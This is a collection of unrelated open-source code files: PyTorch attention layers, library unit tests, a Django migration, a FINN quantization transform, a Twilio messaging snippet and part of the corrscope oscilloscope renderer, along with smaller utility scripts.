('any', b'\x66\x72\x65\x64')
]
}
),
'attributes': [
]
}
)
}
encoded_search_request = db.encode('LDAPMessage', search_request)
pprint(search_request)
print('Sending LDAP search request to the server... ', end='')
sock.sendall(encoded_search_request)
print('done.')
# Receive the search response, decode it, and print it.
print('Receiving LDAP search response from the server... ', end='')
encoded_search_response = sock.recv(2)
length = db.decode_length(encoded_search_response)
encoded_search_response += sock.recv(length - 2)
print('done.')
search_response = db.decode('LDAPMessage', encoded_search_response)
pprint(search_response)
sock.close()
|
finrl_meta/env_execution_optimizing/order_execution_qlib/trade/network/util.py
|
eitin-infant/FinRL-Meta
| 214 |
128659
|
<filename>finrl_meta/env_execution_optimizing/order_execution_qlib/trade/network/util.py
import torch
import numpy as np
from torch import nn
import torch.nn.functional as F
from copy import deepcopy
import sys
from tianshou.data import to_torch
class Attention(nn.Module):
def __init__(self, in_dim, out_dim):
super().__init__()
self.get_w = nn.Sequential(nn.Linear(in_dim * 2, in_dim), nn.ReLU(), nn.Linear(in_dim, 1))
self.fc = nn.Sequential(nn.Linear(in_dim, out_dim), nn.ReLU(),)
def forward(self, value, key):
key = key.unsqueeze(dim=1)
length = value.shape[1]
key = key.repeat([1, length, 1])
weight = self.get_w(torch.cat((key, value), dim=-1)).squeeze() # B * l
weight = weight.softmax(dim=-1).unsqueeze(dim=-1) # B * l * 1
out = (value * weight).sum(dim=1)
out = self.fc(out)
return out
class MaskAttention(nn.Module):
def __init__(self, in_dim, out_dim):
super().__init__()
self.get_w = nn.Sequential(nn.Linear(in_dim * 2, in_dim), nn.ReLU(), nn.Linear(in_dim, 1))
self.fc = nn.Sequential(nn.Linear(in_dim, out_dim), nn.ReLU(),)
def forward(self, value, key, seq_len, maxlen=9):
# seq_len: (batch,)
device = value.device
key = key.unsqueeze(dim=1)
length = value.shape[1]
key = key.repeat([1, length, 1]) # (batch, 9, 64)
weight = self.get_w(torch.cat((key, value), dim=-1)).squeeze(-1) # (batch, 9)
mask = sequence_mask(seq_len + 1, maxlen=maxlen, device=device)
weight[~mask] = float("-inf")
weight = weight.softmax(dim=-1).unsqueeze(dim=-1)
out = (value * weight).sum(dim=1)
out = self.fc(out)
return out
class TFMaskAttention(nn.Module):
def __init__(self, in_dim, out_dim):
super().__init__()
self.get_w = nn.Sequential(nn.Linear(in_dim * 2, in_dim), nn.ReLU(), nn.Linear(in_dim, 1))
self.fc = nn.Sequential(nn.Linear(in_dim, out_dim), nn.ReLU(),)
def forward(self, value, key, seq_len, maxlen=9):
device = value.device
key = key.unsqueeze(dim=1)
length = value.shape[1]
key = key.repeat([1, length, 1])
weight = self.get_w(torch.cat((key, value), dim=-1)).squeeze(-1)
mask = sequence_mask(seq_len + 1, maxlen=maxlen, device=device)
mask = mask.repeat(1, 3) # (batch, 9*3)
weight[~mask] = float("-inf")
weight = weight.softmax(dim=-1).unsqueeze(dim=-1)
out = (value * weight).sum(dim=1)
out = self.fc(out)
return out
class NNAttention(nn.Module):
def __init__(self, in_dim, out_dim):
super().__init__()
self.q_net = nn.Linear(in_dim, out_dim)
self.k_net = nn.Linear(in_dim, out_dim)
self.v_net = nn.Linear(in_dim, out_dim)
def forward(self, Q, K, V):
q = self.q_net(Q)
k = self.k_net(K)
v = self.v_net(V)
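        # Batched dot-product attention scores: attn[b, j, l] = <q[b, j, :], k[b, l, :]>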
attn = torch.einsum("ijk,ilk->ijl", q, k)
attn = attn.to(Q.device)
attn_prob = torch.softmax(attn, dim=-1)
attn_vec = torch.einsum("ijk,ikl->ijl", attn_prob, v)
return attn_vec
class Reshape(nn.Module):
def __init__(self, *args):
super(Reshape, self).__init__()
self.shape = args
def forward(self, x):
return x.view(self.shape)
class DARNN(nn.Module):
def __init__(self, device="cpu", **kargs):
super().__init__()
self.emb_dim = kargs["emb_dim"]
self.hidden_size = kargs["hidden_size"]
self.num_layers = kargs["num_layers"]
self.is_bidir = kargs["is_bidir"]
self.dropout = kargs["dropout"]
self.seq_len = kargs["seq_len"]
self.interval = kargs["interval"]
self.today_length = 238
self.prev_length = 240
self.input_length = 480
self.input_size = 6
self.rnn = nn.LSTM(
input_size=self.input_size + self.emb_dim,
hidden_size=self.hidden_size,
num_layers=self.num_layers,
batch_first=True,
bidirectional=self.is_bidir,
dropout=self.dropout,
)
self.prev_rnn = nn.LSTM(
input_size=self.input_size,
hidden_size=self.hidden_size,
num_layers=self.num_layers,
batch_first=True,
bidirectional=self.is_bidir,
dropout=self.dropout,
)
self.fc_out = nn.Linear(in_features=self.hidden_size * 2, out_features=1)
self.attention = NNAttention(self.hidden_size, self.hidden_size)
self.act_out = nn.Sigmoid()
if self.emb_dim != 0:
self.pos_emb = nn.Embedding(self.input_length, self.emb_dim)
def forward(self, inputs):
inputs = inputs.view(-1, self.input_length, self.input_size) # [B, T, F]
today_input = inputs[:, : self.today_length, :]
today_input = torch.cat((torch.zeros_like(today_input[:, :1, :]), today_input), dim=1)
prev_input = inputs[:, 240 : 240 + self.prev_length, :]
if self.emb_dim != 0:
embedding = self.pos_emb(torch.arange(end=self.today_length + 1, device=inputs.device))
embedding = embedding.repeat([today_input.size()[0], 1, 1])
today_input = torch.cat((today_input, embedding), dim=-1)
prev_outs, _ = self.prev_rnn(prev_input)
today_outs, _ = self.rnn(today_input)
outs = self.attention(today_outs, prev_outs, prev_outs)
outs = torch.cat((today_outs, outs), dim=-1)
outs = outs[:, range(0, self.seq_len * self.interval, self.interval), :]
# outs = self.fc_out(outs).squeeze()
return self.act_out(self.fc_out(outs).squeeze(-1)), outs
class Transpose(nn.Module):
def __init__(self, dim1=0, dim2=1):
super().__init__()
self.dim1 = dim1
self.dim2 = dim2
def forward(self, x):
return x.transpose(self.dim1, self.dim2)
class SelfAttention(nn.Module):
def __init__(self, *args, **kargs):
super().__init__()
self.attention = nn.MultiheadAttention(*args, **kargs)
def forward(self, x):
return self.attention(x, x, x)[0]
def onehot_enc(y, len):
y = y.unsqueeze(-1)
y_onehot = torch.zeros(y.shape[0], len)
    # scatter_ writes in place; the out-of-place scatter() would leave y_onehot all zeros
    y_onehot.scatter_(1, y, 1)
return y_onehot
def sequence_mask(lengths, maxlen=None, dtype=torch.bool, device=None):
if maxlen is None:
maxlen = lengths.max()
mask = ~(torch.ones((len(lengths), maxlen), device=device).cumsum(dim=1).t() > lengths).t()
    mask = mask.type(dtype)
return mask
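# Usage sketch: sequence_mask(torch.tensor([2, 4]), maxlen=5) gives
#   [[ True,  True, False, False, False],
#    [ True,  True,  True,  True, False]]
# i.e. the first `length` positions of each row are True.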
|
utokenize/testdata/basic_multilevel.py
|
MaxTurchin/pycopy-lib
| 126 |
128682
|
<gh_stars>100-1000
def foo():
if 1:
if 2:
pass
|
client/test/monit_perf.py
|
elgalu/labml
| 463 |
128691
|
import time
import torch
from labml import monit, logger
from labml.logger import Text
N = 10_000
def no_section():
arr = torch.zeros((1000, 1000))
for i in range(N):
for t in range(10):
arr += 1
def section():
arr = torch.zeros((1000, 1000))
for i in range(N):
with monit.section('run'):
for t in range(10):
arr += 1
def section_silent():
arr = torch.zeros((1000, 1000))
for i in range(N):
with monit.section('run', is_silent=True):
for t in range(10):
arr += 1
def main():
start = time.time()
no_section()
logger.log('No Section: ', (f'{time.time() - start}', Text.value))
start = time.time()
section()
logger.log('Section: ', (f'{time.time() - start}', Text.value))
start = time.time()
section_silent()
logger.log('Silent Section: ', (f'{time.time() - start}', Text.value))
if __name__ == '__main__':
main()
|
zcls/model/attention_helper.py
|
ZJCV/PyCls
| 110 |
128720
|
# -*- coding: utf-8 -*-
"""
@date: 2020/12/30 4:44 PM
@file: attention_helper.py
@author: zj
@description:
"""
from zcls.model.layers.global_context_block import GlobalContextBlock2D
from zcls.model.layers.squeeze_and_excitation_block import SqueezeAndExcitationBlock2D
from zcls.model.layers.non_local_embedded_gaussian import NonLocal2DEmbeddedGaussian
from zcls.model.layers.simplified_non_local_embedded_gaussian import SimplifiedNonLocal2DEmbeddedGaussian
def make_attention_block(in_planes, reduction, attention_type, **kwargs):
if attention_type == 'GlobalContextBlock2D':
return GlobalContextBlock2D(in_channels=in_planes, reduction=reduction)
elif attention_type == 'SqueezeAndExcitationBlock2D':
return SqueezeAndExcitationBlock2D(in_channels=in_planes, reduction=reduction, **kwargs)
elif attention_type == 'NonLocal2DEmbeddedGaussian':
return NonLocal2DEmbeddedGaussian(in_channels=in_planes)
elif attention_type == 'SimplifiedNonLocal2DEmbeddedGaussian':
return SimplifiedNonLocal2DEmbeddedGaussian(in_channels=in_planes)
else:
raise ValueError('no matching type')
|
scale/job/migrations/0045_auto_20180830_1812.py
|
kaydoh/scale
| 121 |
128733
|
<gh_stars>100-1000
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-08-30 18:12
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('job', '0044_jobtypetag_job_type'),
]
operations = [
migrations.AddField(
model_name='jobexecution',
name='docker_image',
field=models.TextField(null=True),
),
migrations.AddField(
model_name='jobtyperevision',
name='docker_image',
field=models.TextField(default=''),
),
migrations.AlterField(
model_name='jobtype',
name='docker_image',
field=models.CharField(default='', max_length=500),
),
]
|
lib/ansiblereview/vars.py
|
tonyskidmore/ansible-review
| 222 |
128742
|
import codecs
import yaml
from yaml.composer import Composer
from ansiblereview import Result, Error
def hunt_repeated_yaml_keys(data):
"""Parses yaml and returns a list of repeated variables and
the line on which they occur
"""
loader = yaml.Loader(data)
def compose_node(parent, index):
# the line number where the previous token has ended (plus empty lines)
line = loader.line
node = Composer.compose_node(loader, parent, index)
node.__line__ = line + 1
return node
def construct_mapping(node, deep=False):
mapping = dict()
errors = dict()
for key_node, value_node in node.value:
key = key_node.value
if key in mapping:
if key in errors:
errors[key].append(key_node.__line__)
else:
errors[key] = [mapping[key], key_node.__line__]
mapping[key] = key_node.__line__
return errors
loader.compose_node = compose_node
loader.construct_mapping = construct_mapping
data = loader.get_single_data()
return data
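# Illustrative example: for a vars file containing
#   foo: 1
#   bar: 2
#   foo: 3
# hunt_repeated_yaml_keys() returns roughly {'foo': [1, 3]} -- each repeated
# key mapped to the lines on which it appears.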
def repeated_vars(candidate, settings):
with codecs.open(candidate.path, 'r') as f:
errors = hunt_repeated_yaml_keys(f) or dict()
return Result(candidate, [Error(err_line, "Variable %s occurs more than once" % err_key)
for err_key in errors for err_line in errors[err_key]])
|
tests/test_utils.py
|
wkcn/MobulaOP
| 161 |
128747
|
from mobula.utils import get_git_hash
def test_get_git_hash():
git_hash = get_git_hash()
assert type(git_hash) == str, (git_hash, type(git_hash))
assert len(git_hash) == 7 or git_hash == 'custom', git_hash
def test_edict():
from mobula.internal.edict import edict
data = edict(a=3, b=4)
assert 'a' in data
assert hasattr(data, 'a')
assert 'b' in data
assert hasattr(data, 'b')
assert len(data) == 2
assert data['a'] == 3
assert data['b'] == 4
data.a = 5
assert data['a'] == 5
data.a += 3
assert data['a'] == 8
data.update(dict(c=6))
assert 'c' in data
assert data['c'] == 6
data['c'] += 1
assert data['c'] == 7
del data.b
assert 'b' not in data
assert not hasattr(data, 'b')
assert len(data) == 2
del data['a']
assert 'a' not in data
assert len(data) == 1
|
tests/test_level1/test_class.py
|
kianmeng/soupsieve
| 130 |
128755
|
"""Test class selectors."""
from .. import util
from soupsieve import SelectorSyntaxError
class TestClass(util.TestCase):
"""Test class selectors."""
MARKUP = """
<div>
<p>Some text <span id="1" class="foo"> in a paragraph</span>.
<a id="2" class="bar" href="http://google.com">Link</a>
</p>
</div>
"""
# Browsers normally replace NULL with `\uFFFD`, but some of the parsers
# we test just strip out NULL, so we will simulate and just insert `\uFFFD` directly
# to ensure consistent behavior in our tests across parsers.
MARKUP_NULL = """
<div>
<p>Some text <span id="1" class="foo\ufffd"> in a paragraph</span>.
<a id="2" class="\ufffdbar" href="http://google.com">Link</a>
</p>
</div>
"""
def test_class(self):
"""Test class."""
self.assert_selector(
self.MARKUP,
".foo",
["1"],
flags=util.HTML
)
def test_type_and_class(self):
"""Test type and class."""
self.assert_selector(
self.MARKUP,
"a.bar",
["2"],
flags=util.HTML
)
def test_type_and_class_escaped_null(self):
"""Test type and class with an escaped null character."""
self.assert_selector(
self.MARKUP_NULL,
r"a.\0 bar",
["2"],
flags=util.HTML
)
def test_type_and_class_escaped_eof(self):
"""Test type and class with an escaped EOF."""
self.assert_selector(
self.MARKUP_NULL,
"span.foo\\",
["1"],
flags=util.HTML
)
def test_malformed_class(self):
"""Test malformed class."""
# Malformed class
self.assert_raises('td.+#some-id', SelectorSyntaxError)
def test_class_xhtml(self):
"""Test tag and class with XHTML since internally classes are stored different for XML."""
self.assert_selector(
self.wrap_xhtml(self.MARKUP),
".foo",
["1"],
flags=util.XHTML
)
def test_multiple_classes(self):
"""Test multiple classes."""
markup = """
<div>
<p>Some text <span id="1" class="foo"> in a paragraph</span>.
<a id="2" class="bar" href="http://google.com">Link</a>
<a id="3" class="foo" href="http://google.com">Link</a>
<a id="4" class="foo bar" href="http://google.com">Link</a>
</p>
</div>
"""
self.assert_selector(
markup,
"a.foo.bar",
["4"],
flags=util.HTML
)
def test_malformed_pseudo_class(self):
"""Test malformed class."""
# Malformed pseudo-class
self.assert_raises('td:#id', SelectorSyntaxError)
|
jaxlie/hints/__init__.py
|
brentyi/jaxlie
| 128 |
128756
|
<reponame>brentyi/jaxlie<filename>jaxlie/hints/__init__.py
from typing import NamedTuple, Union
import numpy as onp
from jax import numpy as jnp
# Type aliases for JAX/Numpy arrays; primarily for function inputs
Array = Union[onp.ndarray, jnp.ndarray]
"""Type alias for `Union[jnp.ndarray, onp.ndarray]`.
"""
Scalar = Union[float, Array]
"""Type alias for `Union[float, Array]`.
"""
Matrix = Array
"""Type alias for `Array`. Should not be instantiated.
Refers to a square matrix, typically with shape `(Group.matrix_dim, Group.matrix_dim)`.
For adjoints, shape should be `(Group.tangent_dim, Group.tangent_dim)`.
"""
Vector = Array
"""Type alias for `Array`. Should not be instantiated.
Refers to a general 1D array.
"""
TangentVector = Array
"""Type alias for `Array`. Should not be instantiated.
Refers to a 1D array with shape `(Group.tangent_dim,)`.
"""
# Type aliases for JAX arrays; primarily for function outputs
ArrayJax = jnp.ndarray
"""Type alias for jnp.ndarray."""
ScalarJax = ArrayJax
"""Type alias for jnp.ndarray."""
MatrixJax = ArrayJax
"""Type alias for jnp.ndarray."""
VectorJax = ArrayJax
"""Type alias for jnp.ndarray."""
TangentVectorJax = ArrayJax
"""Type alias for jnp.ndarray."""
class RollPitchYaw(NamedTuple):
"""Tuple containing roll, pitch, and yaw Euler angles."""
roll: Scalar
pitch: Scalar
yaw: Scalar
__all__ = [
"Array",
"Scalar",
"Matrix",
"Vector",
"TangentVector",
"ArrayJax",
"ScalarJax",
"MatrixJax",
"VectorJax",
"TangentVectorJax",
"RollPitchYaw",
]
|
messaging/services/service-multiple-number-add/service-multiple-number-add.6.x.py
|
Tshisuaka/api-snippets
| 234 |
128760
|
<reponame>Tshisuaka/api-snippets
# Download the Python helper library from twilio.com/docs/python/install
import os
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/console
# To set up environmental variables, see http://twil.io/secure
account_sid = os.environ['TWILIO_ACCOUNT_SID']
auth_token = os.environ['TWILIO_AUTH_TOKEN']
client = Client(account_sid, auth_token)
phone_numbers_sids = [
"PN<KEY>", "PN557ce644e5ab84fa21cc21112e22c485",
"PN<KEY>"
]
for phone_numbers_sid in phone_numbers_sids:
phone_number = client.messaging \
.services(sid="MG2172dd2db502e20dd981ef0d67850e1a") \
.phone_numbers \
.create(phone_number_sid=phone_numbers_sid)
print(phone_number.sid)
|
src/finn/transformation/qonnx/quant_act_to_multithreshold.py
|
mmrahorovic/finn
| 109 |
128774
|
<filename>src/finn/transformation/qonnx/quant_act_to_multithreshold.py
# Copyright (c) 2021, Xilinx
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of FINN nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import warnings
from finn.transformation.base import Transformation
from finn.transformation.qonnx.qonnx_activation_handlers import QuantActBaseHandler
def default_filter_function_generator(max_multithreshold_bit_width=8):
"""
This function generates the default filter function for the
ConvertQuantActToMultiThreshold transformation. Per default the returned
function disables the conversion of Quant nodes which have a bit width above 8 bit.
This function generator can be used as a template to write custom
filter functions.
"""
def filter_function(model, q_node):
if q_node.op_type == "Quant":
bit_width = model.get_initializer(q_node.input[3])
elif q_node.op_type == "BipolarQuant":
bit_width = 1.0
else:
raise RuntimeError("Got an unexpected quantizer node type")
if bit_width is None:
raise ValueError("Quant nodes must have a static bit width.")
if bit_width > max_multithreshold_bit_width:
warnings.warn(
f'The Quant node with name: "{q_node.name}" was not converted to a '
f"MultiThreshold node, because its bit width of {bit_width} is "
f"higher than the configured maximum bit width of "
f"{max_multithreshold_bit_width}."
)
return False
return True
return filter_function
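# A minimal sketch of a custom filter (the "act_" tensor-name convention is
# purely hypothetical): convert only Quant nodes that feed tensors whose name
# starts with "act_", regardless of bit width.
#
# def my_filter(model, q_node):
#     return q_node.output[0].startswith("act_")
#
# model = model.transform(ConvertQuantActToMultiThreshold(filter_function=my_filter))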
class ConvertQuantActToMultiThreshold(Transformation):
"""
Converts Quant nodes in the activation path to MultiThreshold nodes.
The optional keyword argument `filter_function`
presents a way to control which Quant and BipolarQuant nodes in the activation path
are converted to MultiThreshold nodes. A warning will be emitted when a Quant node
is not converted to a MultiThreshold node.
    :param filter_function: Each candidate Quant and BipolarQuant node is first evaluated
        by this function. If the function returns False,
        then the node is not converted to a MultiThreshold node.
The function is given the model and candidate node as parameters.
Per default a filter function is inserted, which disables the conversion of
Quant nodes, which have a bit width of larger than 8.
Defaults to: default_filter_function_generator(max_multithreshold_bit_width=8)
"""
def __init__(
self,
filter_function=default_filter_function_generator(
max_multithreshold_bit_width=8
),
):
super().__init__()
self._filter_function = filter_function
def apply(self, model):
graph = model.graph
node_ind = 0
graph_modified = False
for n in graph.node:
node_ind += 1
if n.op_type == "Quant" or n.op_type == "BipolarQuant":
# Check that the node is in the activation path
inp = model.get_initializer(n.input[0])
out = model.get_initializer(n.output[0])
if not (inp is None and out is None):
continue
predecessor = model.find_direct_predecessors(n)
if predecessor is not None:
predecessor_op_type = predecessor[0].op_type
else:
predecessor_op_type = predecessor
if model.is_fork_node(n):
raise ValueError(
"Forking Quant/BipolarQuant nodes are currently "
"not supported by FINN."
)
if n.op_type == "Quant" and not model.get_initializer(n.input[2]) == 0:
raise ValueError(
"Only Quant nodes with zero-point == 0 are currently supported."
)
# Check that this node passes the user filter
if not self._filter_function(model, n):
warnings.warn(
f'The Quant node with name: "{n.name}" was not converted to a '
f"MultiThreshold node, because the filtering function "
f"returned False for this node."
)
continue
# Check for possible ambiguity in handler selection
valid_predecessors = []
for cls in QuantActBaseHandler.__subclasses__():
valid_predecessors.extend(cls.valid_predecessor_op_types)
if len(valid_predecessors) != len(set(valid_predecessors)):
raise RuntimeError(
"Two or more activation handlers declare the same "
"type of valid predecessor node. "
"This leads to ambiguity in the handler selection "
"and must thus be avoided."
)
# Try to find a fitting handler for this Quant activation node
for handler_cls in QuantActBaseHandler.__subclasses__():
if predecessor_op_type in handler_cls.valid_predecessor_op_types:
handler = handler_cls(model, n, node_ind)
break
else:
raise ValueError(
f"Quant nodes in the activation path and with predecessor "
f"nodes of type {predecessor_op_type} are currently not "
f"supported by FINN and can not be converted to "
f"MultiThreshold nodes."
)
model = handler.replace_quant_node()
graph_modified = True
return (model, graph_modified)
return (model, graph_modified)
|
scripts/watch_continuous.py
|
drozzy/autonomous-learning-library
| 584 |
128820
|
# pylint: disable=unused-import
import argparse
from all.bodies import TimeFeature
from all.environments import GymEnvironment, PybulletEnvironment
from all.experiments import load_and_watch
from .continuous import ENVS
def main():
parser = argparse.ArgumentParser(description="Watch a continuous agent.")
parser.add_argument("env", help="ID of the Environment")
parser.add_argument("filename", help="File where the model was saved.")
parser.add_argument(
"--device",
default="cuda",
help="The name of the device to run the agent on (e.g. cpu, cuda, cuda:0)",
)
parser.add_argument(
"--fps",
default=120,
help="Playback speed",
)
args = parser.parse_args()
if args.env in ENVS:
env = GymEnvironment(args.env, device=args.device)
elif 'BulletEnv' in args.env or args.env in PybulletEnvironment.short_names:
env = PybulletEnvironment(args.env, device=args.device)
else:
env = GymEnvironment(args.env, device=args.device)
load_and_watch(args.filename, env, fps=args.fps)
if __name__ == "__main__":
main()
|
modules/__init__.py
|
Kandongwe/RunestoneServer
| 344 |
128821
|
<filename>modules/__init__.py
# **************************
# |docname| - web2py modules
# **************************
# .. toctree::
# :maxdepth: 2
# :glob:
#
# *.py
|
notebooks/exercise_solutions/n01_vector_dot_product.py
|
pydy/pydy-tutorial-human-standing
| 134 |
128829
|
from sympy import acos, symbols
from sympy.physics.vector import ReferenceFrame

# a, b and N are created here so the snippet runs standalone
# (the tutorial notebook defines them earlier).
a, b = symbols('a b')
N = ReferenceFrame('N')
v1 = a * N.x + b * N.y + a * N.z
v2 = b * N.x + a * N.y + b * N.z
acos(v1.dot(v2) / (v1.magnitude() * v2.magnitude()))
|
AndroidSpider/html_downloader.py
|
lidenghong1/SmallReptileTraining
| 133 |
128865
|
from http import cookiejar
from urllib import request, error
from urllib.parse import urlparse
class HtmlDownLoader(object):
def download(self, url, retry_count=3, headers=None, proxy=None, data=None):
if url is None:
return None
try:
req = request.Request(url, headers=headers, data=data)
cookie = cookiejar.CookieJar()
cookie_process = request.HTTPCookieProcessor(cookie)
            opener = request.build_opener(cookie_process)
if proxy:
proxies = {urlparse(url).scheme: proxy}
opener.add_handler(request.ProxyHandler(proxies))
content = opener.open(req).read()
except error.URLError as e:
print('HtmlDownLoader download error:', e.reason)
content = None
if retry_count > 0:
if hasattr(e, 'code') and 500 <= e.code < 600:
                    # An HTTPError with a 5xx status code means a server error, so it is worth retrying the download.
return self.download(url, retry_count-1, headers, proxy, data)
return content
|
run_server.py
|
vagnervjs/frame-player
| 233 |
128866
|
<gh_stars>100-1000
# run_server.py
import SimpleHTTPServer
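# Serve files with unknown extensions as plain text and tag every mime type with a UTF-8 charset.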
m = SimpleHTTPServer.SimpleHTTPRequestHandler.extensions_map
m[''] = 'text/plain'
m.update(dict([(k, v + ';charset=UTF-8') for k, v in m.items()]))
SimpleHTTPServer.test()
|
corrscope/renderer.py
|
corrscope/corrscope
| 140 |
128871
|
<reponame>corrscope/corrscope<gh_stars>100-1000
"""
Backend implementations should not inherit from RendererFrontend,
since they don't need to know.
Implementation: Multiple inheritance:
Renderer inherits from (RendererFrontend, backend implementation).
Backend implementation does not know about RendererFrontend.
"""
import enum
import math
import os
from abc import ABC, abstractmethod
from collections import defaultdict
from typing import (
Optional,
List,
TYPE_CHECKING,
Any,
Callable,
TypeVar,
Sequence,
Type,
Union,
Tuple,
Dict,
DefaultDict,
MutableSequence,
)
# DO NOT IMPORT MATPLOTLIB UNTIL WE DELETE mpl_config_dir!
import attr
import numpy as np
import corrscope.generate
from corrscope.channel import ChannelConfig, Channel
from corrscope.config import DumpableAttrs, with_units, TypedEnumDump
from corrscope.layout import (
RendererLayout,
LayoutConfig,
unique_by_id,
RegionSpec,
Edges,
)
from corrscope.util import coalesce, obj_name
"""
On first import, matplotlib.font_manager spends nearly 10 seconds
building a font cache.
PyInstaller redirects matplotlib's font cache to a temporary folder,
deleted after the app exits. This is because in one-file .exe mode,
matplotlib-bundled fonts are extracted and deleted whenever the app runs,
and font cache entries point to invalid paths.
- https://github.com/pyinstaller/pyinstaller/issues/617
- https://github.com/pyinstaller/pyinstaller/blob/c06d853c0c4df7480d3fa921851354d4ee11de56/PyInstaller/loader/rthooks/pyi_rth_mplconfig.py#L35-L37
corrscope uses one-folder mode and deletes all matplotlib-bundled fonts to save
space, so we re-enable the global font cache.
"""
mpl_config_dir = "MPLCONFIGDIR"
if mpl_config_dir in os.environ:
del os.environ[mpl_config_dir]
# matplotlib.use() only affects pyplot. We don't use pyplot.
import matplotlib
import matplotlib.cm
import matplotlib.colors
from matplotlib.backends.backend_agg import FigureCanvasAgg
from matplotlib.figure import Figure
if TYPE_CHECKING:
from matplotlib.artist import Artist
from matplotlib.axes import Axes
from matplotlib.backend_bases import FigureCanvasBase
from matplotlib.colors import ListedColormap
from matplotlib.lines import Line2D
from matplotlib.spines import Spine
from matplotlib.text import Text, Annotation
# Used by outputs.py.
ByteBuffer = Union[bytes, np.ndarray, memoryview]
def default_color() -> str:
# import matplotlib.colors
# colors = np.array([int(x, 16) for x in '1f 77 b4'.split()], dtype=float)
# colors /= np.amax(colors)
# colors **= 1/3
#
# return matplotlib.colors.to_hex(colors, keep_alpha=False)
return "#ffffff"
T = TypeVar("T")
class LabelX(enum.Enum):
Left = enum.auto()
Right = enum.auto()
def match(self, *, left: T, right: T) -> T:
if self is self.Left:
return left
if self is self.Right:
return right
raise ValueError("failed match")
class LabelY(enum.Enum):
Bottom = enum.auto()
Top = enum.auto()
def match(self, *, bottom: T, top: T) -> T:
if self is self.Bottom:
return bottom
if self is self.Top:
return top
raise ValueError("failed match")
class LabelPosition(TypedEnumDump):
def __init__(self, x: LabelX, y: LabelY):
self.x = x
self.y = y
LeftBottom = (LabelX.Left, LabelY.Bottom)
LeftTop = (LabelX.Left, LabelY.Top)
RightBottom = (LabelX.Right, LabelY.Bottom)
RightTop = (LabelX.Right, LabelY.Top)
class Font(DumpableAttrs, always_dump="*"):
# Font file selection
family: Optional[str] = None
bold: bool = False
italic: bool = False
# Font size
size: float = with_units("pt", default=20)
# QFont implementation details
    toString: Optional[str] = None
class RendererConfig(
DumpableAttrs, always_dump="*", exclude="viewport_width viewport_height"
):
width: int
height: int
line_width: float = with_units("px", default=1.5)
grid_line_width: float = with_units("px", default=1.0)
@property
def divided_width(self):
return round(self.width / self.res_divisor)
@property
def divided_height(self):
return round(self.height / self.res_divisor)
bg_color: str = "#000000"
init_line_color: str = default_color()
@property
def global_line_color(self) -> str:
return self.init_line_color
# Whether to color lines by the pitch of the current note.
global_color_by_pitch: bool = False
# 12 colors, representing how to color pitches C through B.
pitch_colors: List[str] = corrscope.generate.spectral_colors
grid_color: Optional[str] = None
stereo_grid_opacity: float = 0.25
midline_color: str = "#404040"
v_midline: bool = False
h_midline: bool = False
# Label settings
label_font: Font = attr.ib(factory=Font)
label_position: LabelPosition = LabelPosition.LeftTop
# The text will be located (label_padding_ratio * label_font.size) from the corner.
label_padding_ratio: float = with_units("px/pt", default=0.5)
label_color_override: Optional[str] = None
@property
def get_label_color(self):
return coalesce(self.label_color_override, self.global_line_color)
antialiasing: bool = True
# Performance (skipped when recording to video)
res_divisor: float = 1.0
# Debugging only
viewport_width: float = 1
viewport_height: float = 1
def __attrs_post_init__(self) -> None:
# round(np.int32 / float) == np.float32, but we want int.
assert isinstance(self.width, (int, float))
assert isinstance(self.height, (int, float))
assert len(self.pitch_colors) == 12, len(self.pitch_colors)
# Both before_* functions should be idempotent, AKA calling twice does no harm.
def before_preview(self) -> None:
"""Called *once* before preview. Does nothing."""
pass
def before_record(self) -> None:
"""Called *once* before recording video. Eliminates res_divisor."""
self.res_divisor = 1
def gen_circular_cmap(colors: List[str]):
colors = list(colors)
# `colors` has 12 distinct entries.
# LinearSegmentedColormap(colors) takes a real number `x` between 0 and 1,
# and maps x=0 to colors[0] and x=1 to colors[-1].
# pitch_cmap should be periodic, so `colors[0]` should appear at both x=0 and x=1.
colors.append(colors[0])
cmap = matplotlib.colors.LinearSegmentedColormap.from_list(
"12-tone spectrum", colors, N=256, gamma=1.0
)
return cmap
def freq_to_color(cmap, freq: Optional[float], fallback_color: str) -> str:
if not freq:
return fallback_color
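    # 12 * log2(freq / 440) + 69 is the standard MIDI note number for a frequency
    # (A4 = 440 Hz = note 69); fmod(..., 12) keeps only the pitch class within the octave.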
key_number = 12 * math.log2(freq / 440) + 69
color = cmap(math.fmod(key_number, 12) / 12)
return color
@attr.dataclass
class LineParam:
color: str
color_by_pitch: bool
@attr.dataclass
class RenderInput:
# Should Renderer store a Wave and take an int?
# Or take an array on each frame?
data: np.ndarray
freq_estimate: Optional[float]
@staticmethod
def stub_new(data: np.ndarray) -> "RenderInput":
"""
Stable function to construct a RenderInput given only a data array.
Used mainly for tests.
"""
return RenderInput(data, None)
@staticmethod
def wrap_datas(datas: List[np.ndarray]) -> List["RenderInput"]:
"""
Stable function to construct a list of RenderInput given only datas.
Used mainly for tests.
"""
return [RenderInput.stub_new(data) for data in datas]
